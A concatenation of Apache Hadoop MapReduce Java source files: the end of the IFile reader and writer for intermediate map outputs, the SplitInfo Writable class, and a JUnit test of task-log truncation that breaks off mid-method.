this.checksumOut = new IFileOutputStream(out);
this.rawOut = out;
this.start = this.rawOut.getPos();
if (codec != null) {
this.compressor = CodecPool.getCompressor(codec);
if (this.compressor != null) {
this.compressor.reset();
this.compressedOut = codec.createOutputStream(checksumOut, compressor);
this.out = new FSDataOutputStream(this.compressedOut, null);
this.compressOutput = true;
} else {
LOG.warn("Could not obtain compressor from CodecPool");
this.out = new FSDataOutputStream(checksumOut,null);
}
} else {
this.out = new FSDataOutputStream(checksumOut,null);
}
this.keyClass = keyClass;
this.valueClass = valueClass;
if (keyClass != null) {
SerializationFactory serializationFactory = new SerializationFactory(
conf);
this.keySerializer = serializationFactory.getSerializer(keyClass);
this.keySerializer.open(buffer);
this.valueSerializer = serializationFactory.getSerializer(valueClass);
this.valueSerializer.open(buffer);
}
}
public Writer(Configuration conf, FileSystem fs, Path file)
throws IOException {
this(conf, fs, file, null, null, null, null);
}
public void close() throws IOException {
// When IFile writer is created by BackupStore, we do not have
// Key and Value classes set. So, check before closing the
// serializers
if (keyClass != null) {
keySerializer.close();
valueSerializer.close();
}
// Write EOF_MARKER for key/value length
WritableUtils.writeVInt(out, EOF_MARKER);
WritableUtils.writeVInt(out, EOF_MARKER);
decompressedBytesWritten += 2 * WritableUtils.getVIntSize(EOF_MARKER);
//Flush the stream
out.flush();
if (compressOutput) {
// Flush
compressedOut.finish();
compressedOut.resetState();
}
// Close the underlying stream iff we own it...
if (ownOutputStream) {
out.close();
}
else {
// Write the checksum
checksumOut.finish();
}
compressedBytesWritten = rawOut.getPos() - start;
if (compressOutput) {
// Return back the compressor
CodecPool.returnCompressor(compressor);
compressor = null;
}
out = null;
if(writtenRecordsCounter != null) {
writtenRecordsCounter.increment(numRecordsWritten);
}
}
public void append(K key, V value) throws IOException {
if (key.getClass() != keyClass)
throw new IOException("wrong key class: "+ key.getClass()
+" is not "+ keyClass);
if (value.getClass() != valueClass)
throw new IOException("wrong value class: "+ value.getClass()
+" is not "+ valueClass);
// Append the 'key'
keySerializer.serialize(key);
int keyLength = buffer.getLength();
if (keyLength < 0) {
throw new IOException("Negative key-length not allowed: " + keyLength +
" for " + key);
}
// Append the 'value'
valueSerializer.serialize(value);
int valueLength = buffer.getLength() - keyLength;
if (valueLength < 0) {
throw new IOException("Negative value-length not allowed: " +
valueLength + " for " + value);
}
// Write the record out
WritableUtils.writeVInt(out, keyLength); // key length
WritableUtils.writeVInt(out, valueLength); // value length
out.write(buffer.getData(), 0, buffer.getLength()); // data
// Reset
buffer.reset();
// Update bytes written
decompressedBytesWritten += keyLength + valueLength +
WritableUtils.getVIntSize(keyLength) +
WritableUtils.getVIntSize(valueLength);
++numRecordsWritten;
}
public void append(DataInputBuffer key, DataInputBuffer value)
throws IOException {
int keyLength = key.getLength() - key.getPosition();
if (keyLength < 0) {
throw new IOException("Negative key-length not allowed: " + keyLength +
" for " + key);
}
int valueLength = value.getLength() - value.getPosition();
if (valueLength < 0) {
throw new IOException("Negative value-length not allowed: " +
valueLength + " for " + value);
}
WritableUtils.writeVInt(out, keyLength);
WritableUtils.writeVInt(out, valueLength);
out.write(key.getData(), key.getPosition(), keyLength);
out.write(value.getData(), value.getPosition(), valueLength);
// Update bytes written
decompressedBytesWritten += keyLength + valueLength +
WritableUtils.getVIntSize(keyLength) +
WritableUtils.getVIntSize(valueLength);
++numRecordsWritten;
}
/**
* streaming write to output stream.
*/
public void write(byte[] b, int offset, int length) throws IOException {
this.out.write(b, offset, length);
decompressedBytesWritten += length;
}
public long getRawLength() {
return decompressedBytesWritten;
}
public long getCompressedLength() {
return compressedBytesWritten;
}
}
/**
* interface for writing records.
*
* @author Administrator
* @param <K>
* @param <V>
*/
public interface IWriter<K, V> {
public void append(K key, V value) throws IOException;
public void append(DataInputBuffer key, DataInputBuffer value)
throws IOException;
public void close() throws IOException;
public long getRawLength();
public long getCompressedLength();
}
/***
* interface for writing byte streaming data.
*
* @author Administrator
*/
public interface IStreamWriter {
public void write(byte[] b, int offset, int length) throws IOException;
public void close() throws IOException;
}
/***
* interface for reading records
*
* @author Administrator
*/
public interface IReader {
public long getLength();
public long getPosition() throws IOException;
public boolean nextRawKey(DataInputBuffer key) throws IOException;
public void nextRawValue(DataInputBuffer value) throws IOException;
public void close() throws IOException;
public void reset(int offset);
}
/***
* interface for dumping data bytes.
*
* @author Administrator
*/
public interface IDump {
public void dumpTo(
IStreamWriter writer,
Progressable progressable,
Configuration conf) throws IOException;
}
/*
* public static interface IWriter<K,V> { public void append(K key, V value)
* throws IOException; public void append(DataInputBuffer key, DataInputBuffer
* value); public long getRawLength(); public long getCompressedLength(); }
*/
/**
* <code>IFile.Reader</code> to read intermediate map-outputs.
*/
public static class Reader<K extends Object, V extends Object> implements
IReader, IDump {
private static final int DEFAULT_BUFFER_SIZE = 128 * 1024;
private static final int MAX_VINT_SIZE = 9;
// Count records read from disk
private long numRecordsRead = 0;
private final Counters.Counter readRecordsCounter;
final InputStream in; // Possibly decompressed stream that we read
Decompressor decompressor;
public long bytesRead = 0;
protected final long fileLength;
protected final long rawLen;
protected boolean eof = false;
final IFileInputStream checksumIn;
protected byte[] buffer = null;
protected int bufferSize = DEFAULT_BUFFER_SIZE;
protected DataInputBuffer dataIn = new DataInputBuffer();
protected int recNo = 1;
protected int currentKeyLength;
protected int currentValueLength;
// for an input stream backed by a disk file, hasStream is true
// for an input stream backed by a byte array, hasStream is false
private final boolean hasStream;
/**
* Construct an IFile Reader.
*
* @param conf Configuration File
* @param fs FileSystem
* @param file Path of the file to be opened. This file should have
* checksum bytes for the data at the end of the file.
* @param codec codec
* @param readsCounter Counter for records read from disk
* @throws IOException
*/
public Reader(Configuration conf, FileSystem fs, Path file,
CompressionCodec codec,
Counters.Counter readsCounter) throws IOException {
this(conf, fs.open(file),
fs.getFileStatus(file).getLen(),
codec, readsCounter);
}
public Reader(Configuration conf,
FSDataInputStream in,
long length,
CompressionCodec codec,
Counters.Counter readsCounter) throws IOException {
this(conf, in, length, -1, codec, readsCounter);
}
/**
* Construct an IFile Reader.
*
* @param conf Configuration File
* @param in The input stream
* @param length Length of the data in the stream, including the checksum
* bytes.
* @param codec codec
* @param readsCounter Counter for records read from disk
* @throws IOException
*/
public Reader(Configuration conf,
FSDataInputStream in,
long length,
long rawLen,
CompressionCodec codec,
Counters.Counter readsCounter) throws IOException {
hasStream = (in != null);
readRecordsCounter = readsCounter;
checksumIn = new IFileInputStream(in,length);
if (codec != null) {
decompressor = CodecPool.getDecompressor(codec);
if (decompressor != null) {
this.in = codec.createInputStream(checksumIn, decompressor);
} else {
LOG.warn("Could not obtain decompressor from CodecPool");
this.in = checksumIn;
}
} else {
this.in = checksumIn;
}
this.fileLength = length;
this.rawLen = rawLen;
if (conf != null) {
bufferSize = conf.getInt("io.file.buffer.size", DEFAULT_BUFFER_SIZE);
}
}
/***
* to verify the EOF marker matches
*
* @param din
* @throws IOException
*/
protected static void verifyEOF(DataInputStream din) throws IOException {
int eof1 = WritableUtils.readVInt(din);
int eof2 = WritableUtils.readVInt(din);
if (eof1 != IFile.EOF_MARKER || eof2 != IFile.EOF_MARKER) {
throw new IOException(" the eof marker " + eof1 + " and " + eof2
+ " can't match IFILE.EOF_MARKER " + IFile.EOF_MARKER);
}
}
public long getLength() {
return fileLength - checksumIn.getSize();
}
public long getPosition() throws IOException {
return checksumIn.getPosition();
}
/**
* Read up to len bytes into buf starting at offset off.
*
* @param buf buffer
* @param off offset
* @param len length of buffer
* @return the no. of bytes read
* @throws IOException
*/
private int readData(byte[] buf, int off, int len) throws IOException {
int bytesRead = 0;
while (bytesRead < len) {
int n = in.read(buf, off+bytesRead, len-bytesRead);
if (n < 0) {
return bytesRead;
}
bytesRead += n;
}
return len;
}
void readNextBlock(int minSize) throws IOException {
if (buffer == null) {
buffer = new byte[bufferSize];
dataIn.reset(buffer, 0, 0);
}
buffer =
rejigData(buffer,
(bufferSize < minSize) ? new byte[minSize << 1] : buffer);
bufferSize = buffer.length;
}
private byte[] rejigData(byte[] source, byte[] destination)
throws IOException{
// Copy remaining data into the destination array
int bytesRemaining = dataIn.getLength()-dataIn.getPosition();
if (bytesRemaining > 0) {
System.arraycopy(source, dataIn.getPosition(),
destination, 0, bytesRemaining);
}
// Read as much data as will fit from the underlying stream
int n = readData(destination, bytesRemaining,
(destination.length - bytesRemaining));
dataIn.reset(destination, 0, (bytesRemaining + n));
return destination;
}
protected boolean positionToNextRecord(DataInputBuffer dataIn)
throws IOException {
// Sanity check
if (eof) {
throw new EOFException("Completed reading " + bytesRead);
}
if (hasStream) {
// Check if we have enough data to read lengths
if ((dataIn.getLength() - dataIn.getPosition()) < 2 * MAX_VINT_SIZE) {
readNextBlock(2 * MAX_VINT_SIZE);
}
}
// Read key and value lengths
int oldPos = dataIn.getPosition();
currentKeyLength = WritableUtils.readVInt(dataIn);
currentValueLength = WritableUtils.readVInt(dataIn);
int pos = dataIn.getPosition();
bytesRead += pos - oldPos;
// Check for EOF
if (currentKeyLength == EOF_MARKER && currentValueLength == EOF_MARKER) {
eof = true;
return false;
}
// Sanity check
if (currentKeyLength < 0) {
throw new IOException("Rec# " + recNo + ": Negative key-length: "
+ currentKeyLength);
}
if (currentValueLength < 0) {
throw new IOException("Rec# " + recNo + ": Negative value-length: "
+ currentValueLength);
}
return true;
}
public boolean nextRawKey(DataInputBuffer key) throws IOException {
if (!positionToNextRecord(dataIn)) {
return false;
}
final int recordLength = currentKeyLength + currentValueLength;
int pos = dataIn.getPosition();
// Check if we have the raw key/value in the buffer
if ((dataIn.getLength() - pos) < recordLength) {
readNextBlock(recordLength);
// Sanity check
if ((dataIn.getLength() - dataIn.getPosition()) < recordLength) {
throw new EOFException("Rec# " + recNo + ": Could read the next "
+ " record");
}
}
pos = dataIn.getPosition();
byte[] data = dataIn.getData();
key.reset(data, pos, currentKeyLength);
long skipped = dataIn.skip(currentKeyLength);
// Position for the next record
if (skipped != currentKeyLength) {
throw new IOException("Rec# " + recNo
+ ": Failed to skip past key of length: " + currentKeyLength);
}
bytesRead += currentKeyLength;
return true;
}
public void nextRawValue(DataInputBuffer value) throws IOException {
value.reset(dataIn.getData(), dataIn.getPosition(), currentValueLength);
// Position for the next record
long skipped = dataIn.skip(currentValueLength);
if (skipped != currentValueLength) {
throw new IOException("Rec# " + recNo
+ ": Failed to skip past value of length: " + currentValueLength);
}
// Record the bytes read
bytesRead += currentValueLength;
++recNo;
++numRecordsRead;
}
public void close() throws IOException {
// Close the underlying stream
in.close();
// Release the buffer
dataIn = null;
buffer = null;
if (readRecordsCounter != null) {
readRecordsCounter.increment(numRecordsRead);
}
// Return the decompressor
if (decompressor != null) {
decompressor.reset();
CodecPool.returnDecompressor(decompressor);
decompressor = null;
}
}
public void reset(int offset) {
return;
}
private static int readData(InputStream in, byte[] buf, int off, int len)
throws IOException {
int bytesRead = 0;
while (bytesRead < len) {
int n = in.read(buf, off + bytesRead, len - bytesRead);
if (n < 0) {
return bytesRead;
}
bytesRead += n;
}
return len;
}
/***
* this implementation is for file based inputstream.
*/
@Override
public void dumpTo(
IStreamWriter writer,
Progressable progressable,
Configuration conf) throws IOException {
// TODO make it configurable?
byte[] buffer = new byte[MAX_BYTES_TO_READ];
long rawLength = rawLen - LEN_OF_EOF;
long sum = 0;
while (sum < rawLength) {
int count = readData(in, buffer, 0, Math.min(MAX_BYTES_TO_READ,
(int) (rawLength - sum)));
sum += count;
writer.write(buffer, 0, count);
progressable.progress();
}
buffer = null;
verifyEOF(new DataInputStream(in));
}
}
}
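// Usage sketch (illustrative; the file name and the Text key/value types are
// hypothetical choices, not required by IFile):
//
//   Configuration conf = new Configuration();
//   FileSystem fs = FileSystem.getLocal(conf);
//   Path file = new Path("/tmp/map_0.out");
//
//   IFile.Writer<Text, Text> writer =
//       new IFile.Writer<Text, Text>(conf, fs, file, Text.class, Text.class,
//                                    null /* no codec */, null /* no counter */);
//   writer.append(new Text("key"), new Text("value"));
//   writer.close();                       // writes the EOF_MARKER pair and checksum
//
//   IFile.Reader<Text, Text> reader =
//       new IFile.Reader<Text, Text>(conf, fs, file, null, null);
//   DataInputBuffer key = new DataInputBuffer();
//   DataInputBuffer value = new DataInputBuffer();
//   while (reader.nextRawKey(key)) {      // raw bytes; deserialize with Text#readFields
//     reader.nextRawValue(value);
//   }
//   reader.close();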
<|start_filename|>src/mapred/org/apache/hadoop/mapred/SplitInfo.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import org.apache.hadoop.io.Writable;
public class SplitInfo implements Writable {
private String inputSplitClass;
private byte[] inputSplitObject;
private long inputDataLength;
private String[] locations;
public SplitInfo(String inputSplitClass, byte[] inputSplitObject, long inputDataLength, String[] locations) {
this.setInputSplitClass(inputSplitClass);
this.setInputSplitObject(inputSplitObject);
this.inputDataLength = inputDataLength;
this.locations = locations;
}
SplitInfo() {
}
@Override
public void readFields(DataInput in) throws IOException {
setInputSplitClass(in.readUTF());
int len = in.readInt();
setInputSplitObject(new byte[len]);
in.readFully(getInputSplitObject());
inputDataLength = in.readLong();
int locationNum = in.readInt();
locations = new String[locationNum];
for(int i = 0; i < locationNum; ++i)
locations[i] = in.readUTF();
}
@Override
public void write(DataOutput out) throws IOException {
out.writeUTF(getInputSplitClass());
out.writeInt(getInputSplitObject().length);
out.write(getInputSplitObject());
out.writeLong(inputDataLength);
out.writeInt(locations.length);
for(String location : locations)
out.writeUTF(location);
}
public void setInputSplitObject(byte[] inputSplitObject) {
this.inputSplitObject = inputSplitObject;
}
public byte[] getInputSplitObject() {
return inputSplitObject;
}
public void setInputSplitClass(String inputSplitClass) {
this.inputSplitClass = inputSplitClass;
}
public String getInputSplitClass() {
return inputSplitClass;
}
public void setInputDataLength(long inputDataLength) {
this.inputDataLength = inputDataLength;
}
public long getInputDataLength() {
return inputDataLength;
}
public void setLocations(String[] locations) {
this.locations = locations;
}
public String[] getLocations() {
return locations;
}
}
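// Illustrative sketch (not part of the original file): SplitInfo round-trips
// through the Writable interface; the split class name, payload, length and
// hosts below are hypothetical values for a unit-test style check.
//
//   SplitInfo info = new SplitInfo("some.InputSplitImpl",
//       new byte[] {1, 2, 3}, 42L, new String[] {"host1", "host2"});
//   org.apache.hadoop.io.DataOutputBuffer out =
//       new org.apache.hadoop.io.DataOutputBuffer();
//   info.write(out);
//   org.apache.hadoop.io.DataInputBuffer in =
//       new org.apache.hadoop.io.DataInputBuffer();
//   in.reset(out.getData(), out.getLength());
//   SplitInfo copy = new SplitInfo();
//   copy.readFields(in);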
<|start_filename|>src/test/org/apache/hadoop/mapred/TestTaskLogsTruncater.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.net.URI;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
import java.util.Random;
import org.apache.commons.logging.LogFactory;
import org.apache.commons.logging.Log;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.filecache.DistributedCache;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.mapred.TaskLog.LogFileDetail;
import org.apache.hadoop.mapred.TaskLog.LogName;
import org.apache.hadoop.mapred.lib.IdentityMapper;
import org.apache.hadoop.mapreduce.server.tasktracker.JVMInfo;
import org.apache.hadoop.mapreduce.server.tasktracker.userlogs.JvmFinishedEvent;
import org.apache.hadoop.mapreduce.server.tasktracker.userlogs.UserLogManager;
import org.apache.hadoop.mapreduce.split.JobSplit;
import org.junit.After;
import org.junit.Ignore;
import org.junit.Test;
import static org.junit.Assert.*;
/**
* Verify the logs' truncation functionality.
*/
public class TestTaskLogsTruncater {
static final Log LOG = LogFactory.getLog(TestTaskLogsTruncater.class);
private static int truncatedMsgSize = TaskLogsTruncater.TRUNCATED_MSG.getBytes().length;
/**
* Clean up any stale directories after enabling writable permissions for all
* attempt-dirs.
*
* @throws IOException
*/
@After
public void tearDown() throws IOException {
File logDir = TaskLog.getUserLogDir();
for (File attemptDir : logDir.listFiles()) {
attemptDir.setWritable(true);
FileUtil.fullyDelete(attemptDir);
}
}
private void writeBytes(TaskAttemptID firstAttemptID, TaskAttemptID attemptID,
LogName logName, long numBytes, boolean random, char data) throws IOException {
File logFile = TaskLog.getTaskLogFile(firstAttemptID, false, logName);
File logLocation = logFile.getParentFile();
LOG.info("Going to write " + numBytes + " real bytes to the log file "
+ logFile);
if (!logLocation.exists()
&& !logLocation.mkdirs()) {
throw new IOException("Couldn't create all ancestor dirs for "
+ logFile);
}
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
if (!attemptDir.exists() && !attemptDir.mkdirs()) {
throw new IOException("Couldn't create all ancestor dirs for "
+ logFile);
}
// Need to call up front to set currenttaskid.
TaskLog.syncLogs(logLocation.toString(), attemptID, false, true);
FileOutputStream outputStream = new FileOutputStream(logFile, true);
Random r = new Random();
for (long i = 0; i < numBytes; i++) {
if(random) {
outputStream.write(r.nextInt());
} else {
outputStream.write(data);
}
}
outputStream.close();
TaskLog.syncLogs(logLocation.toString(), attemptID, false, true);
LOG.info("Written " + logFile.length() + " real bytes to the log file "
+ logFile);
}
private void writeRandomBytes(TaskAttemptID firstAttemptID,
TaskAttemptID attemptID, LogName logName, long numBytes)
throws IOException {
writeBytes(firstAttemptID, attemptID, logName, numBytes, true, ' ');
}
private void writeRealChars(TaskAttemptID firstAttemptID,
TaskAttemptID attemptID, LogName logName, long numChars, char data)
throws IOException {
writeBytes(firstAttemptID, attemptID, logName, numChars, false, data);
}
private static Map<LogName, Long> getAllLogsFileLengths(
TaskAttemptID tid, boolean isCleanup) throws IOException {
Map<LogName, Long> allLogsFileLengths = new HashMap<LogName, Long>();
// If the index file doesn't exist, we cannot get log-file lengths. So set
// them to zero.
if (!TaskLog.getIndexFile(tid, isCleanup).exists()) {
for (LogName log : LogName.values()) {
allLogsFileLengths.put(log, Long.valueOf(0));
}
return allLogsFileLengths;
}
Map<LogName, LogFileDetail> logFilesDetails =
TaskLog.getAllLogsFileDetails(tid, isCleanup);
for (LogName log : logFilesDetails.keySet()) {
allLogsFileLengths.put(log,
Long.valueOf(logFilesDetails.get(log).length));
}
return allLogsFileLengths;
}
private Configuration setRetainSizes(long mapRetainSize,
long reduceRetainSize) {
Configuration conf = new Configuration();
conf.setLong(TaskLogsTruncater.MAP_USERLOG_RETAIN_SIZE, mapRetainSize);
conf.setLong(TaskLogsTruncater.REDUCE_USERLOG_RETAIN_SIZE, reduceRetainSize);
return conf;
}
/**
* Test cases which don't need any truncation of log-files. Without JVM-reuse.
*
* @throws IOException
*/
@Test
public void testNoTruncationNeeded() throws IOException {
Configuration conf = setRetainSizes(1000L, 1000L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
//Task task = new MapTask(null, attemptID, 0, new JobSplit.TaskSplitIndex(),
// 0);
// Let the tasks write logs within retain-size
for (LogName log : LogName.values()) {
writeRandomBytes(attemptID, attemptID, log, 500);
}
File logIndex = TaskLog.getIndexFile(attemptID, false);
long indexModificationTimeStamp = logIndex.lastModified();
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
assertEquals("index file got modified", indexModificationTimeStamp,
logIndex.lastModified());
// Finish the task and the JVM too.
JVMInfo jvmInfo = null;
trunc.truncateLogs(jvmInfo);
// There should be no truncation of the log-file.
assertTrue(attemptDir.exists());
assertEquals("index file got modified", indexModificationTimeStamp,
logIndex.lastModified());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(log).longValue());
}
// truncate it once again
trunc.truncateLogs(jvmInfo);
assertEquals("index file got modified", indexModificationTimeStamp,
logIndex.lastModified());
logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(log).longValue());
}
}
/**
* Test the disabling of truncation of log-file.
*
* @throws IOException
*/
@Test
public void testDisabledLogTruncation() throws IOException {
// Anything less than 0 disables the truncation.
Configuration conf = setRetainSizes(-1L, -1L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
Task task = null;
// Let the tasks write some logs
for (LogName log : LogName.values()) {
writeRandomBytes(attemptID, attemptID, log, 1500);
}
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Finish the task and the JVM too.
JVMInfo jvmInfo = new JVMInfo(attemptDir, Arrays.asList(task));
trunc.truncateLogs(jvmInfo);
// The log-file should not be truncated.
assertTrue(attemptDir.exists());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(1500, logFile.length());
// The index file should also be proper.
assertEquals(1500, logLengths.get(log).longValue());
}
}
/**
* Test the truncation of log-file when JVMs are not reused.
*
* @throws IOException
*/
@Test
public void testLogTruncationOnFinishing() throws IOException {
Configuration conf = setRetainSizes(1000L, 1000L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
Task task = null;
// Let the tasks write logs more than retain-size
for (LogName log : LogName.values()) {
writeRandomBytes(attemptID, attemptID, log, 1500);
}
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Finish the task and the JVM too.
JVMInfo jvmInfo = new JVMInfo(attemptDir, Arrays.asList(task));
trunc.truncateLogs(jvmInfo);
// The log-file should now be truncated.
assertTrue(attemptDir.exists());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(log).longValue());
}
// truncate once again
logLengths = getAllLogsFileLengths(attemptID, false);
for (LogName log : LogName.values()) {
File logFile = TaskLog.getTaskLogFile(attemptID, false, log);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(log).longValue());
}
}
/**
* Test the truncation of log-file.
*
* It writes two log files and truncates one, does not truncate other.
*
* @throws IOException
*/
@Test
public void testLogTruncation() throws IOException {
Configuration conf = setRetainSizes(1000L, 1000L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseId = new TaskID();
int taskcount = 0;
TaskAttemptID attemptID = new TaskAttemptID(baseId, taskcount++);
Task task = null;
// Let the tasks write logs more than retain-size
writeRandomBytes(attemptID, attemptID, LogName.SYSLOG, 1500);
writeRandomBytes(attemptID, attemptID, LogName.STDERR, 500);
File attemptDir = TaskLog.getAttemptDir(attemptID, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Finish the task and the JVM too.
JVMInfo jvmInfo = new JVMInfo(attemptDir, Arrays.asList(task));
trunc.truncateLogs(jvmInfo);
// The log-file should now be truncated.
assertTrue(attemptDir.exists());
Map<LogName, Long> logLengths = getAllLogsFileLengths(attemptID, false);
File logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.SYSLOG);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(LogName.SYSLOG)
.longValue());
String syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attemptID, false);
assertTrue(syslog.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.STDERR);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(LogName.STDERR).longValue());
String stderr = TestMiniMRMapRedDebugScript.readTaskLog(LogName.STDERR,
attemptID, false);
assertFalse(stderr.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
// truncate once again
trunc.truncateLogs(jvmInfo);
logLengths = getAllLogsFileLengths(attemptID, false);
logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.SYSLOG);
assertEquals(1000 + truncatedMsgSize, logFile.length());
// The index file should also be proper.
assertEquals(1000 + truncatedMsgSize, logLengths.get(LogName.SYSLOG)
.longValue());
logFile = TaskLog.getTaskLogFile(attemptID, false, LogName.STDERR);
assertEquals(500, logFile.length());
// The index file should also be proper.
assertEquals(500, logLengths.get(LogName.STDERR).longValue());
}
/**
* Test the truncation of log-file when JVM-reuse is enabled.
*
* @throws IOException
*/
@Test
public void testLogTruncationOnFinishingWithJVMReuse() throws IOException {
Configuration conf = setRetainSizes(150L, 150L);
TaskLogsTruncater trunc = new TaskLogsTruncater(conf);
TaskID baseTaskID = new TaskID();
int attemptsCount = 0;
// Assuming the job's retain size is 150
TaskAttemptID attempt1 = new TaskAttemptID(baseTaskID, attemptsCount++);
Task task1 = null;
// Let the tasks write logs more than retain-size
writeRealChars(attempt1, attempt1, LogName.SYSLOG, 200, 'A');
File attemptDir = TaskLog.getAttemptDir(attempt1, false);
assertTrue(attemptDir + " doesn't exist!", attemptDir.exists());
// Start another attempt in the same JVM
TaskAttemptID attempt2 = new TaskAttemptID(baseTaskID, attemptsCount++);
Task task2 = null;
// Let attempt2 also write some logs
writeRealChars(attempt1, attempt2, LogName.SYSLOG, 100, 'B');
// Start yet another attempt in the same JVM
TaskAttemptID attempt3 = new TaskAttemptID(baseTaskID, attemptsCount++);
Task task3 = null;
// Let attempt3 also write some logs
writeRealChars(attempt1, attempt3, LogName.SYSLOG, 225, 'C');
// Finish the JVM.
JVMInfo jvmInfo = new JVMInfo(attemptDir,
Arrays.asList((new Task[] { task1, task2, task3 })));
trunc.truncateLogs(jvmInfo);
// The log-file should now be truncated.
assertTrue(attemptDir.exists());
File logFile = TaskLog.getTaskLogFile(attempt1, false, LogName.SYSLOG);
assertEquals(400 + (2 * truncatedMsgSize), logFile.length());
// The index files should also be proper.
assertEquals(150 + truncatedMsgSize, getAllLogsFileLengths(attempt1, false)
.get(LogName.SYSLOG).longValue());
assertEquals(100, getAllLogsFileLengths(attempt2, false)
.get(LogName.SYSLOG).longValue());
assertEquals(150 + truncatedMsgSize, getAllLogsFileLengths(attempt3, false)
.get(LogName.SYSLOG).longValue());
// assert data for attempt1
String syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attempt1, false);
assertTrue(syslog.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
String truncatedLog = syslog.substring(truncatedMsgSize);
for (int i = 0 ; i < 150; i++) {
assertEquals("Truncation didn't happen properly. At "
+ (i + 1) + "th byte, expected 'A' but found "
+ truncatedLog.charAt(i), 'A', truncatedLog.charAt(i));
}
// assert data for attempt2
syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attempt2, false);
for (int i = 0 ; i < 100; i++) {
assertEquals("Truncation didn't happen properly. At "
+ (i + 1) + "th byte, expected 'B' but found "
+ syslog.charAt(i), 'B', syslog.charAt(i));
}
// assert data for attempt3
syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attempt3, false);
assertTrue(syslog.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
truncatedLog = syslog.substring(truncatedMsgSize);
for (int i = 0 ; i < 150; i++) {
assertEquals("Truncation didn't happen properly. At "
+ (i + 1) + "th byte, expected 'C' but found "
+ truncatedLog.charAt(i), 'C', truncatedLog.charAt(i));
}
trunc.truncateLogs(jvmInfo);
// Only the first and third attempts' logs are truncated, so include
// 2 * length of the TRUNCATED_MSG header
assertEquals(400 + 2 * truncatedMsgSize, logFile.length());
}
private static String TEST_ROOT_DIR =
new File(System.getProperty("test.build.data", "/tmp")).toURI().toString().replace(
' ', '+');
private static String STDERR_LOG = "stderr log";
public static class LoggingMapper<K, V> extends IdentityMapper<K, V> {
public void map(K key, V val, OutputCollector<K, V> output,
Reporter reporter) throws IOException {
// Write lots of logs
for (int i = 0; i < 1000; i++) {
System.out.println("Lots of logs! Lots of logs! "
+ "Waiting to be truncated! Lots of logs!");
}
// write some log into stderr
System.err.println(STDERR_LOG);
super.map(key, val, output, reporter);
}
}
/**
* Test logs monitoring with {@link MiniMRCluster}
*
* @throws IOException
*/
@Test
@Ignore // Truncation is now done in the Child JVM, because the TaskTracker
// no longer has write access to the user log dir. MiniMRCluster
// needs to be modified to put the config params set here in a config
// on the Child's classpath
public void testLogsMonitoringWithMiniMR() throws IOException {
MiniMRCluster mr = null;
try {
final long LSIZE = 10000L;
